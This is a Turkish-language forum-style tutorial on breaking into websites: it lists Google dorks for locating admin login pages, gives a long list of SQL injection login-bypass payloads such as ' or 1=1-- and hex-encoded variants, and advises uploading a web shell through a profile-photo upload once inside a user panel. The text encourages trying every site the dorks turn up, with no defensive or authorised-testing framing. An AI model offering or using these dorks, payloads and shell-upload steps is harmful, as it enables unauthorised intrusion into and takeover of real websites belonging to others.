Bypass ile dork yazma ve site hackleme hakkında anlatım yapıcağım (:
Bypass nedir ?
Bana göre bypass script kodlanmasındaki hatalardan yararlanarak admin login ve pass ' ı bug 'a sokarak giriş yapmamızı sağlayan küçük bir hata ve büyük bir zarar...
Başlayalım hadi (:
ByPass için dork nasıl yazıcağız nasıl site bulabileceğiz ?
ByPass dorklarımızı kendimiz oluşturalım
Örnek çok kullanılan dorklar :
inurl:/admin/login.php
inurl:/administrator/index.php
inurl:/admins/login.php
inurl/admin1/login.php
Ama hacklenen siteleri kaç kere hackleyebileceğizki hep aynı siteler (:
Öncelikle bir sitenin admin panelini buluyoruz
ByPass için Login ve Pass lar ;
Evet bir sitenin admin logini bulduk diyelim (:'=' 'or' ''Or'='Or'' anything' OR 'x'='x 1'or'1'='1 ' or 1=1 or ''=' " or 1=1 or ""=" ' OR ''=' '' OR ''='' 'OR''=' hey' or 1=1– ''Or 1 = 1' ' or 1=1-- or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a hi") or ("a"="a 'hi' or 'x'='x'; x' or 1=1 or 'x'='y \x27\x4F\x52 SELECT * \x27\x6F\x72 SELECT * 'or select * admin'-- ")) or (("x"))=(("x " or ""+" admin"or 1=1 or ""=" admin") or ("1"="1"--
Örnek admin loginler ;
Yeni bir dork oluşturmayıda ekleyim bari konuya
Arkadaşlar bu dorklardan fazla site çıkmayabilir bunun içinde diğer şekilde şöyle bir mantıkla kendi kafamızdaki kelimeler ile site çıkartabiliriz .. Örnek ;
intext Komutuna kelime ekleyerek daha değişik siteler çıkartabilirsiniz :=)inurl:admin/login.php intext:Skoda inurl:admin/login.php intext:Daikin
inurl:/manager/login.php inurl:/panelv2/login.php inurl:/panel/login.php inurl:/eng/login.php
Ve arkadaşlar girdik panele başarılı olduk lakin her siteye girmez dediğim gibi (:
Bazen kullanıcı paneli çıkar giriş yaparsınız edit yaparsınız ee neden sitede hiçbirşey değişmedi dersiniz , çünkü orası user giriş yeri admin yetkisi yoktur (:
Ee değişmedi diye hemen çıkacak değiliz dimi (:
Biraz uğraşıcağız , kullanıcı panelinde upload yeri varmı onu araştırıcağız.
Profil fotoğrafı yükleme yetkisi var ise shell yüklemeyi deniyeceğiz
Bypass Dorkları ile Nasıl Giriş Yapılır Oda Videoda Anlatılmıştır ;
Arkadaşlar bu dork oluşturma sizlerin hayal gücünüze kalmış birşey tabiki her siteye girecek diye birşey yoktur ama eğer başarılı olmak istiyor iseniz sonuna kadar denemelisiniz (:
Başarı sır değildir.
Evet arkadaşlar anlatacağım bu kadar bence fazlaya gerek yok (:
Dediğim gibi siteye girmiyor diye bıkmayın bunun için googlede yandexte vs. dorkları aradağımızda önümüze çıkan siteleri tek tek deneyeceğiz.
Azimli olun yeterli.
Konuyu paylaşırken kaynak belirtin.!